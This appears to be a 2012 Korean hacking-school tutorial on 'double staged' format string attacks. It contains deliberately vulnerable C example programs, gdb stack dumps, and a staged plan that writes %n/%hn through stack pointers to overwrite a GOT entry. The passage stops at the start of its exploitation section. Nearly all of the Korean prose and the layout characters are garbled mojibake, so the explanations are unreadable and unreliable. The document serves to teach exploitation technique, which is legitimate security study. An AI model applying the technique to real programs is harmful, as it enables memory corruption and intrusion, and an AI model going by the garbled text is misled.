¦®¦³¦¬¦³¦³¦¬¦¬¦³¦¬¦¬¦¬¦³¦¬¦¬¦¬¦³¦¬¦¬¦¬¦³¦¬¦³¦¬¦³¦¬¦³¦¬¦³¦¬¦¬¦¬¦¯ ¦­¦­ ¦­¦­ ¦­ ¦¬¦´ ¦¬¦´ ¦­ ¦­ ¦­ ¦­ ¦­ ¦¬¦¶¦¯ ¦­ ¦­ ¦­ ¦­ ¦­ ¦®¦¬¦´ ¦­ ¦­ ¦­¦­ ¦­ ¦­ ¦²¦¬ ¦­ ¦¬¦´ ¦­ ¦²¦¯ ¦®¦¶¦¬ ¦­¦­ ¦²¦¬¦¬¦¬¦µ¦¬¦¬¦µ¦¬¦¬¦¬¦µ¦¬¦¬¦¬¦µ¦¬¦¬¦¬¦µ¦¬¦¬¦¬¦°¦±¦¬¦°¦±¦¬¦¬¦¬¦´¦­ ¦­Since 2002. W / I / S / E / G / U / Y / S in HackerSchool ¦­¦­ ¦­http://research.hackerschool.org wiseguys@hackerschool.org ¦­¦­ ¦±¦³¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦°¦­ ¦±¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬Designed by FiaDot¦¬¦° ¦¬[Document Infomation] ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ :: Title :: Double Staged Format String Attack :: Date :: 2012. 8. 14 :: Author :: pwn3r :: Editor :: pwn3r :: Contact:: E-Mail(austinkwon2@gmail.com) Homepage(http://pwn3r.tistory.com) ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[Notice]¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ º» ¹®¼­ÀÇ ÀúÀÛ±ÇÀº ÀúÀÚ ¹× WiseGuys ¿¡°Ô ÀÖ½À´Ï´Ù. »ó¾÷ÀûÀÎ ¿ëµµ ¿Ü¿¡ ¾î¶°ÇÑ ¿ëµµ(º¹»ç,Àοë,¼öÁ¤,¹èÆ÷)·Îµµ »ç¿ëÇÒ ¼ö ÀÖÀ¸¸ç WiseguysÀÇ µ¿ÀÇ ¾øÀÌ »ó¾÷ÀûÀÎ ¸ñÀûÀ¸·Î »ç¿ëµÊÀ» ±ÝÁöÇÕ´Ï´Ù. º» ¹®¼­·Î ÀÎÇØ ¹ß»ýÇÑ ¾î¶°ÇÑ »ç°Ç¿¡ ´ëÇÑ Ã¥ÀÓµµ ÀúÀÛ±ÇÀÚ¿¡°Ô´Â ¾øÀ½À» ¹àÈü´Ï´Ù. º» ¹®¼­ÀÇ À߸øµÈ ºÎºÐÀ̳ª ÁöÀûÀ̳ª Ãß°¡ÇÏ°í ½ÍÀº ³»¿ëÀº ÀúÀÚ¿¡°Ô ¸ÞÀÏÀ» º¸³»±â ¹Ù¶ø´Ï´Ù. ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[Index] ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ 0x00. Intro 0x01. Normal Format String Bug 0x02. Double Staged Format String Attack 0x03. Exploitation case 0x04. Conclusion ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[0x00 Intro]¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ÀÌ ¹®¼­¿¡¼­ ¼Ò°³ÇÏ´Â ±â¼úÀº ´ëȸ ¶§¸¶´Ù »õ·Î¿î ±â¼úÀ» µå¶øÇϽô ½´ÆÛÇØÄ¿ mongiiÇü´ÔÀÌ ¸¸µå½Å Format String Bug Exploitation ±â¼ú Áß ÇϳªÀÔ´Ï´Ù. ´ëȸ¹®Á¦»Ó¸¸ ¾Æ´Ï¶ó ¸®¾ó¿ùµå Bug¸¦ °ø·«ÇÒ ¶§¿¡µµ Æí¸®ÇÏ°Ô »ç¿ë°¡´É ÇÑ ±â¼úÀÎ °Í °°¾Æ ¹®¼­È­ÇÏ°Ô µÇ¾ú½À´Ï´Ù. * ÀÌ ¹®¼­´Â notepad¿¡¼­ ±¼¸²Ã¼·Î ÀÐÀ¸¼Å¾ß Á¤»óÀûÀ¸·Î ÀÐÇôÁý´Ï´Ù -_-; ÆíÀÇ»ó °æ¾îü´Â »ý·«ÇÏ°Ú½À´Ï´Ù. ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[0x01 Normal Format String Bug]¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ Çü½ÄÀûÀÌÁö¸¸ ¿ì¼± ÀϹÝÀûÀÎ Format String Bug(FSB)¸¦ °ø·«ÇÏ´Â ¹æ¹ýºÎÅÍ º¸µµ·Ï ÇÑ´Ù. ÀϹÝÀûÀ¸·Î FSB¸¦ °ø·«ÇÏ´Â »óȲÀ» ¿¹·Î µé¾îº¸ÀÚ. ---------------------------------------- |#include | | | |FILE *fp; | | | |int main() | |{ | | char buf[1024]; | | fgets(buf , 1024 , stdin); | | fp = fopen("/tmp/trash" , "w");| | fprintf(fp , buf); | | fclose(fp); | | return 0; | |} | ---------------------------------------- 0.3ÃÊ ¸¸¿¡ ÀÎÁöÇÒ ¼ö ÀÖ´Â FSB Ãë¾àÁ¡À» °¡Áø ÇÁ·Î±×·¥ÀÌ´Ù. Áö¿ªº¯¼ö buf¿¡ 1024 byte¸¸Å­ fgets ÇÔ¼ö·Î ÀÔ·ÂÀ» ¹Þ°í fprintfÇÔ¼ö·Î Æ÷¸Ë½ºÆ®¸µ ¾øÀÌ Ãâ·ÂÇϱ⠶§¹®¿¡ Format String Bug Ãë¾àÁ¡ÀÌ ¹ß»ýÇÑ´Ù. ÀÌ·¯ÇÑ ÇüÅ·ΠFSBÃë¾àÁ¡ÀÌ ÀÖ´Â ÇÁ·Î±×·¥Àº ½ºÅÿ¡ Control °¡´ÉÇÑ °ªÀÌ Àֱ⠶§¹®¿¡ À̸¦ ÀÎÀÚ·Î ÀÌ¿ëÇØ Æí¸®ÇÏ°Ô ¿øÇÏ´Â ÁÖ¼Ò¿¡ °ªÀ» µ¤¾î¾º¿ï ¼ö ÀÖ´Ù. ----------------------------------------------------------------------------- (gdb) r Starting program: /home/pwn3r/DSFSA/test2 aaaabbbbcccc Breakpoint 1, 0x08048587 in main () (gdb) x/i $eip => 0x8048587 : call 0x8048444 (gdb) x/100x $esp 0xbffff330: 0x0804b008 0xbffff34c 0x00294440 0x00000006 0xbffff340: 0x00000004 0x00000004 0x00000174 0x61616161 0xbffff350: 0x62626262 0x63636363 0x0000000a 0x00000004 0xbffff360: 0x00000004 0x00000007 0x001531c8 0x001541c8 0xbffff370: 0x001541c8 0x00000008 0x00000040 0x00000004 0xbffff380: 0x00000004 0x6474e550 0x0013b4dc 0x0013b4dc 0xbffff390: 0x0013b4dc 0x0000332c 0x0000332c 0x00000004 0xbffff3a0: 0x00000004 0x6474e551 0x00000000 0x00000000 0xbffff3b0: 0x00000000 0x00000000 0x00000000 0x00000006 0xbffff3c0: 0x00000004 0x6474e552 0x001531c8 0x001541c8 0xbffff3d0: 0x001541c8 0x00001e38 0x0012bff4 0xbffff61c 0xbffff3e0: 0x00000000 0xbffff40c 0x0011ce9c 0x00000000 0xbffff3f0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff400: 0x01fe81e7 0x00000000 0x001289d4 0xbffff4ec 0xbffff410: 0x0011d7e6 0xbffff61c 0x00000000 0x0014ade0 0xbffff420: 0x0d696910 0xbffff45c 0x001189f6 0x001507c9 0xbffff430: 0x001105dc 0x0000000e 0x001507b1 0x0012fda8 0xbffff440: 0xbfff0002 0x0011e590 0x001507b1 0x0012fac0 0xbffff450: 0x0012bff4 0x00141d7c 0x00000001 0xbffff4e8 0xbffff460: 0x00118fa6 0x003016a0 0x8e808426 0x24420804 0xbffff470: 0xbffff800 0x0012f838 0x00000000 0x0012bff4 0xbffff480: 0xbffff61c 0x00000000 0x00141db0 0x0012873c 0xbffff490: 0xbffff4b0 0x00124861 0x00000007 0x0014ade0 0xbffff4a0: 0x0012fb1c 0x7c96f087 0x00000000 0x00000003 0xbffff4b0: 0x0012c524 0x00000000 0x00000000 0x00000001 ----------------------------------------------------------------------------- º¸´Ù½ÃÇÇ 0xbffff34cºÎÅÍ ¿øÇÏ´Â µ¥ÀÌÅÍ°¡ ±×´ë·Î µé¾î°¬±â ¶§¹®¿¡ , Format String Bug¸¦ ExploitÇÒ ¶§ ÀÎÀÚ·Î »ç¿ëÇÏ¿© ¸Å¿ì °£´ÜÇÏ°Ô °ø·«ÀÌ °¡´ÉÇÏ´Ù. ÇÏÁö¸¸ Ç×»ó ÀÌó·³ ½ºÅÿ¡ Control °¡´ÉÇÑ °ªÀÌ ÀÖ´Â °ÍÀº ¾Æ´Ï´Ù. ½ºÅÿ¡ Control °¡´ÉÇÑ µ¥ÀÌÅÍ°¡ ÀüÇô ¾ø´Â »óȲÀ̶ó¸é À̸¦ ¾î¶»°Ô °ø·«ÇÒ °ÍÀΰ¡? ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[0x02 Double Staged Format String Attack]¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ º»°ÝÀûÀ¸·Î Double Staged Format String Attack¿¡ ´ëÇØ ¼³¸íÇÏ°Ú´Ù. 0x01¿¡¼­ ¾ð±ÞÇßµíÀÌ Format String Bug´Â ÀϾÁö¸¸ ½ºÅÿ¡ ¿ì¸®°¡ Control°¡´ÉÇÑ °ªÀÌ ¾ø´Ù°í °¡Á¤Çϸé ÀÌ Bug¸¦ ¾î¶»°Ô °ø·«ÇÒ °ÍÀΰ¡? À̹ø¿¡µµ ¿¹Á¦Äڵ带 ÀÛ¼ºÇغ¸ÀÚ. ---------------------------------------- |#include | | | |FILE *fp; | |char buf[1024]; | | | |int main() | |{ | | fgets(buf , 1024 , stdin); | | fp = fopen("/tmp/trash" , "w");| | fprintf(fp , buf); | | fclose(fp); | | return 0; | |} | ---------------------------------------- ¶Ç ´ë³õ°í FSBÃë¾àÁ¡ÀÌ ¹ß»ýÇÏÁö¸¸ 0x01Àå¿¡ ÀÖ´Â ¼Ò½º¿Í ´Ù¸¥Á¡Àº bufº¯¼ö°¡ Àü¿ªº¯¼ö¶ó´Â Á¡ÀÌ´Ù. À̹ø¿£ Àü¿ªº¯¼ö¿¡¸¸ ÀÔ·ÂÀ» ¹Þ°í printfÇÔ¼ö·Î format string ¾øÀÌ Ãâ·ÂÇÑ´Ù. Local¿¡¼­ °ø°ÝÇÏ´Â »óȲÀÏ ¶© ȯ°æº¯¼ö¿µ¿ª¿¡ ¿øÇÏ´Â ÀÎÀÚ¸¦ ±¸¼º½ÃÄÑÁÜÀ¸·Î½á ½±°Ô °ø·«ÀÌ °¡´ÉÇÏ°ÚÁö¸¸ , À§ ¼Ò½º¸¦ ÄÄÆÄÀÏ ÇÑ ¹ÙÀ̳ʸ®°¡ µ¥¸óÀ¸·Î µ¹¾Æ°¡°í ÀÖ¾î Remote¿¡¼­ °ø°ÝÇØ¾ß ÇÏ´Â ÀÔÀåÀ̶ó¸é , Á¤¸»·Î ½ºÅÿ¡ ÀÖ´Â °ªÀ» ´Ü 1byteµµ ¿øÇÏ´Â ´ë·Î Á¶ÀÛÇÒ ¼ö ¾ø´Â »óȲÀÌ´Ù. ÇÏÁö¸¸ ÀÌ ÇÁ·Î±×·¥ ¿ª½Ãµµ °ø·«ÀÌ °¡´ÉÇÏ´Ù. Double Staged Format String AttackÀÇ ÇÙ½ÉÀº ½ºÅÿ¡ ÀÖ´Â Æ÷ÀÎÅ͸¦ ÀÌ¿ëÇØ Æ÷ÀÎÅÍ°¡ °¡¸®Å°°í ÀÖ´Â ÁÖ¼Ò¿¡ ³»°¡ ¿øÇÏ´Â ÀÎÀÚ¸¦ µ¤¾îÁÖ°í , ±× ÀÎÀÚ¿¡ ÇØ´çÇÏ´Â ÁÖ¼Ò¿¡ ¿øÇÏ´Â °ªÀ» ½á³Ö´Â °ÍÀÌ´Ù. Áï , 2°³ÀÇ Stage·Î ³ª´©¾î¼­ º¸ÀÚ¸é (1) Stage0Àº ½ºÅÿ¡ ÀÖ´Â Æ÷ÀÎÅ͸¦ ÀÌ¿ëÇØ Æ÷ÀÎÅÍ°¡ °¡¸®Å°°í ÀÖ´Â °ªÀ» "µ¤¾îÁÙ ÁÖ¼Ò"·Î Á¶ÀÛ (2) Stage1Àº Stage0¿¡¼­ ¸¸µé¾îÁø ÀÎÀÚ¸¦ ÂüÁ¶ÇØ ¿øÇÏ´Â ÁÖ¼Ò¿¡ "¿øÇÏ´Â °ª"À» µ¤¾îÁÜ À§Ã³·³ ³ª´­ ¼ö ÀÖ´Ù. ±×·³ ¿¹Á¦Äڵ带 ÄÄÆÄÀÏÇÏ¿© ¸Þ¸ð¸®³»¿¡ ¾ó¸¶³ª ¸¹Àº ½ºÅÃÆ÷ÀÎÅ͵éÀÌ ÀÖ´ÂÁö È®ÀÎÇغ¸ÀÚ. (fprintfÇÔ¼ö¿¡¼­ Format String Bug°¡ ¹ß»ýÇϹǷΠfprintfÇÔ¼ö È£ÃâÁ÷ÀüÀÇ ¸Þ¸ð¸®¸¦ È®ÀÎÇÑ´Ù.) ----------------------------------------------------------------------------- (gdb) x/i $eip => 0x8048516 : call 0x80483fc (gdb) x/100x $esp 0xbffff740: 0x0804b008 0x0804a060 0x00284440 0x00283ff4 0xbffff750: 0x08048540 0x00000000 0xbffff7d8 0x00144bd6 0xbffff760: 0x00000001 0xbffff804 0xbffff80c 0xb7fff858 0xbffff770: 0xbffff7c0 0xffffffff 0x0012bff4 0x080482c2 0xbffff780: 0x00000001 0xbffff7c0 0x0011d626 0x0012cab0 0xbffff790: 0xb7fffb48 0x00283ff4 0x00000000 0x00000000 0xbffff7a0: 0xbffff7d8 0x9971399c 0x4e08cee3 0x00000000 0xbffff7b0: 0x00000000 0x00000000 0x00000001 0x08048410 0xbffff7c0: 0x00000000 0x00123230 0x00144afb 0x0012bff4 0xbffff7d0: 0x00000001 0x08048410 0x00000000 0x08048431 0xbffff7e0: 0x080484c4 0x00000001 0xbffff804 0x08048540 0xbffff7f0: 0x08048530 0x0011e030 0xbffff7fc 0x0012c8f8 0xbffff800: 0x00000001 0xbffff924 0x00000000 0xbffff93b 0xbffff810: 0xbffff94b 0xbffff956 0xbffff9a6 0xbffff9c8 0xbffff820: 0xbffff9db 0xbffff9e6 0xbffffe87 0xbffffe93 0xbffff830: 0xbffffee0 0xbffffef5 0xbfffff04 0xbfffff1a 0xbffff840: 0xbfffff2b 0xbfffff34 0xbfffff46 0xbfffff57 0xbffff850: 0xbfffff5f 0xbfffff6d 0xbfffffa3 0xbfffffc3 0xbffff860: 0x00000000 0x00000020 0x0012d420 0x00000021 0xbffff870: 0x0012d000 0x00000010 0x0febf3ff 0x00000006 0xbffff880: 0x00001000 0x00000011 0x00000064 0x00000003 0xbffff890: 0x08048034 0x00000004 0x00000020 0x00000005 0xbffff8a0: 0x00000008 0x00000007 0x00110000 0x00000008 0xbffff8b0: 0x00000000 0x00000009 0x08048410 0x0000000b 0xbffff8c0: 0x000003e8 0x0000000c 0x000003e8 0x0000000d ----------------------------------------------------------------------------- ²Ï ¸¹Àº ½ºÅÃÆ÷ÀÎÅ͵éÀÌ ´«¿¡ ¶è´Ù. Æ÷¸Ë½ºÆ®¸µ »ç¿ë ½Ã ¸Þ¸ð¸®ÀÇ ³ôÀº ÁÖ¼Ò ¹æÇâÀ¸·Î ½ºÅà °ªµéÀ» ²¨³»¿À¹Ç·Î ½ºÅÃÆ÷ÀÎÅÍ°¡ À§Ä¡ÇÑ ÁÖ¼Òº¸´Ù ´õ ³ôÀº ÁÖ¼Ò¸¦ °¡¸®Å°´Â Æ÷ÀÎÅÍ¿©¾ßÇϸç , Æ÷ÀÎÅÍ¿Í Æ÷ÀÎÅÍ°¡ °¡¸®Å°´Â ÁÖ¼ÒÀÇ »ó´ë°Å¸®´Â Ç×»ó °°¾Æ¾ß ÇÑ´Ù. (»ó´ë°Å¸®°¡ °è¼Ó º¯ÇÏ¸é »ç¿ëÇϱⰡ Èûµê) Á¶°Ç¿¡ ¸Â´Â Æ÷ÀÎÅ͸¸À» ÇÊÅÍÇغ¸ÀÚ. ----------------------------------------------------------------------------- (gdb) x/100x $esp 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... 0xbffff7d8 .......... 0xbffff760: .......... 0xbffff804 0xbffff80c .......... 0xbffff770: 0xbffff7c0 .......... .......... .......... 0xbffff780: .......... 0xbffff7c0 .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: 0xbffff7d8 .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x00000000 .......... .......... .......... 0xbffff7d0: .......... .......... 0x00000000 .......... 0xbffff7e0: .......... .......... 0xbffff804 .......... 0xbffff7f0: .......... .......... 0xbffff7fc 0x0012c8f8 0xbffff800: .......... 0xbffff924 .......... 0xbffff93b 0xbffff810: 0xbffff94b 0xbffff956 0xbffff9a6 0xbffff9c8 0xbffff820: 0xbffff9db 0xbffff9e6 0xbffffe87 0xbffffe93 0xbffff830: 0xbffffee0 0xbffffef5 0xbfffff04 0xbfffff1a 0xbffff840: 0xbfffff2b 0xbfffff34 0xbfffff46 0xbfffff57 0xbffff850: 0xbfffff5f 0xbfffff6d 0xbfffffa3 0xbfffffc3 0xbffff860: .......... .......... .......... .......... 0xbffff870: .......... .......... .......... .......... 0xbffff880: .......... .......... .......... .......... 0xbffff890: .......... .......... .......... .......... 0xbffff8a0: .......... .......... .......... .......... 0xbffff8b0: .......... .......... .......... .......... 0xbffff8c0: .......... .......... .......... .......... ----------------------------------------------------------------------------- ¸¶À½¾¾ ÁÁÀº ½ºÅÃÀº ¿ì¸®¸¦ À§ÇØ ¼ö ¸¹Àº Æ÷ÀÎÅ͸¦ ³²°ÜµÎ¾ú´Ù. ÀÌÁ¦ ¿©±â¼­ »ç¿ëÇÒ Æ÷ÀÎÅ͸¦ Á¤Çغ¸ÀÚ. ¿ì¼± »ç¿ëÇÒ Æ÷ÀÎÅÍÀÇ °³¼ö´Â 2°³ÀÌ´Ù. ÇÑ °³´Â fclose@got¸¦ ¸¸µé¾îÁÙ Æ÷ÀÎÅÍ ³ª¸ÓÁö ÇÑ °³´Â fclose@got+2¸¦ ¸¸µé¾îÁÙ Æ÷ÀÎÅÍÀÌ´Ù. ----------------------------------------------------------------------------- 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... .......... .......... 0xbffff760: .......... 0xbffff804 .......... .......... 0xbffff770: 0xbffff7c0 .......... .......... .......... 0xbffff780: .......... .......... .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: .......... .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x00000000 .......... .......... .......... 0xbffff7d0: .......... .......... .......... .......... 0xbffff7e0: .......... .......... .......... .......... 0xbffff7f0: .......... .......... .......... .......... 0xbffff800: .......... 0xbffff924 .......... .......... .......................................................................... ----------------------------------------------------------------------------- ÀÌ·¸°Ô ÀÓÀÇ·Î 2°³ÀÇ Æ÷ÀÎÅÍ(0xbffff804 , 0xbffff7c0)¸¦ ¼±ÅÃÇß´Ù. ÀÌÁ¦ º¸´Ï »ó´ë°Å¸®µµ ±×¸® ¸ÖÁö ¾Ê¾Æ º¸ÀδÙ. ±×·³ ÀÌÁ¦ ÀÓÀÇ·Î ÁöÁ¤ÇÑ ÁÖ¼Ò 0x08049ffc¿¡ ÀÓÀÇÀÇ °ª 0xdeadbeef¸¦ µ¤´Â °ÍÀ» ÃÖÁ¾¸ñÇ¥·Î ÇÏ¿©, À§¿¡¼­ ¾ð±ÞÇß´ø °Íó·³ Stage¸¦ ³ª´©¾î Payload¸¦ ±¸»óÇغ¸ÀÚ. Stage0 ----------------------------------------------------------------------------- 0x08049ffc: 0x0012ffc0 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... .......... .......... 0xbffff760: .......... 0xbffff804 (%n) .......... .......... 0xbffff770: 0xbffff7c0 .......... .......... .......... 0xbffff780: .......... .......... .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: .......... .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x00000000 .......... .......... .......... 0xbffff7d0: .......... .......... .......... .......... 0xbffff7e0: .......... .......... .......... .......... 0xbffff7f0: .......... .......... .......... .......... 0xbffff800: .......... 0x08049ffc .......... .......... .......................................................................... ----------------------------------------------------------------------------- Stage0Àº µÎ ½ºÅÃÆ÷ÀÎÅ͸¦ ÀÌ¿ëÇØ ½ºÅà µÞºÎºÐ¿¡ Stage1¿¡¼­ »ç¿ëÇÒ ÁÖ¼Ò °ªÀ» ±¸¼ºÇÏ´Â °úÁ¤ÀÌ´Ù. À§ ·Î±×¸¦ º¸¸é 0xbffff804¸¦ °¡¸®Å°´Â Æ÷ÀÎÅÍ ÀÚ¸®¿¡¼­ %n Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇÔÀ¸·Î½á 0xbffff804 ¸Þ¸ð¸®¿¡ 0x08049ffc¶ó´Â ÁÖ¼Ò °ªÀ» µ¤¾î½è´Ù. Stage0 ----------------------------------------------------------------------------- 0x08049ffc: 0x0012ffc0 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... .......... .......... 0xbffff760: .......... 0xbffff804 .......... .......... 0xbffff770: 0xbffff7c0 (%n) .......... .......... .......... 0xbffff780: .......... .......... .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: .......... .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x08049ffe .......... .......... 0xbffff7d0: .......... .......... .......... .......... 0xbffff7e0: .......... .......... .......... .......... 0xbffff7f0: .......... .......... .......... .......... 0xbffff800: .......... 0x08049ffc .......... .......... .......................................................................... ----------------------------------------------------------------------------- À̹ø¿£ 0xbffff7c0 Æ÷ÀÎÅÍÀÚ¸®¿¡¼­ %n Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇÔÀ¸·Î½á 0xbffff7c0 ¸Þ¸ð¸®¿¡ 0x08049ffe¶ó´Â ÁÖ¼Ò °ªÀ» µ¤¾î›§´Ù. Stage1 ----------------------------------------------------------------------------- 0x08049ffc: 0xdeadffc0 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... .......... .......... 0xbffff760: .......... 0xbffff804 .......... .......... 0xbffff770: 0xbffff7c0 .......... .......... .......... 0xbffff780: .......... .......... .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: .......... .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x08049ffe(%hn) .......... .......... .......... 0xbffff7d0: .......... .......... .......... .......... 0xbffff7e0: .......... .......... .......... .......... 0xbffff7f0: .......... .......... .......... .......... 0xbffff800: .......... 0x08049ffc .......... .......... .......................................................................... ----------------------------------------------------------------------------- Stage1Àº Stage0¿¡¼­ ½ºÅÿ¡ ¸¸µé¾îÁØ ÁÖ¼Ò °ªÀ» »ç¿ëÇØ ¿øÇÏ´Â ÁÖ¼Ò¿¡ °ªÀ» µ¤¾î¾²´Â °úÁ¤ÀÌ´Ù. ¾Æ±î Àü¿¡ ¸¸µé¾îÁØ 0x08049ffeÀÚ¸®¿¡¼­ %hn Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇØ ÇØ´ç ÁÖ¼Ò¿¡ °ªÀ» µ¤¾î½è´Ù. Stage1 ----------------------------------------------------------------------------- 0x08049ffc: 0xdeadbeef 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... .......... .......... 0xbffff760: .......... 0xbffff804 .......... .......... 0xbffff770: 0xbffff7c0 .......... .......... .......... 0xbffff780: .......... .......... .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: .......... .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x08049ffe .......... .......... .......... 0xbffff7d0: .......... .......... .......... .......... 0xbffff7e0: .......... .......... .......... .......... 0xbffff7f0: .......... .......... .......... .......... 0xbffff800: .......... 0x08049ffc(%hn) .......... .......... .......................................................................... ----------------------------------------------------------------------------- À̹ø¿£ 0x08049ffcÀÚ¸®¿¡¼­ %hn Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇØ ÇØ´ç ÁÖ¼Ò¿¡ °ªÀ» µ¤¾î¾¸À¸·Î½á 0x08049ffc¿¡ ÀÖ´Â 4byteÀÇ µ¥ÀÌÅ͸¦ 0xdeadbeef·Î Á¶ÀÛÇß´Ù. ¿ø¸®ÀÚü´Â ¿­¶ó °£´ÜÇϸ鼭µµ ½ÇÁ¦·Î ½áº¸¸é Á» °£Áö³­´Ù -_-b ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[0x03 Exploitation Case]¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ (* ¾Æ·¡¿¡ ÀûÈù Ç®À̺¸´Ù Á»´õ ½±°Ô Ç®ÀÌ°¡ °¡´ÉÇÏÁö¸¸ ÀÌÇظ¦ µ½±â À§ÇØ ¾à°£ µ¹·Á¼­ Ç®ÀÌÇÒ °ÍÀÌ´Ù) ---------------------------------------- |#include | | | |FILE *fp; | |char buf[1024]; | | | |int main() | |{ | | fgets(buf , 1024 , stdin); | | fp = fopen("/tmp/trash" , "w");| | fprintf(fp , buf); | | fclose(fp); | | return 0; | |} | ---------------------------------------- 0x02Àå¿¡¼­ ÀÛ¼ºÇß´ø testÄڵ带 ±×´ë·Î Exploit Çغ¼ °ÍÀÌ´Ù. ÀÌ ¹®¼­¿¡¼­ ¼³¸íÇÏ°íÀÚ ÇÏ´Â °Ç ¸Þ¸ð¸® º¸È£±â¹ý ¿ìȸ±â¼úÀÌ ¾Æ´Ï¹Ç·Î NX¸¦ ²¨µÐ ä·Î ¼³¸íÀ» ÁøÇàÇÏ°Ú´Ù. 0x02Àå¿¡¼­ º» °Íó·³ 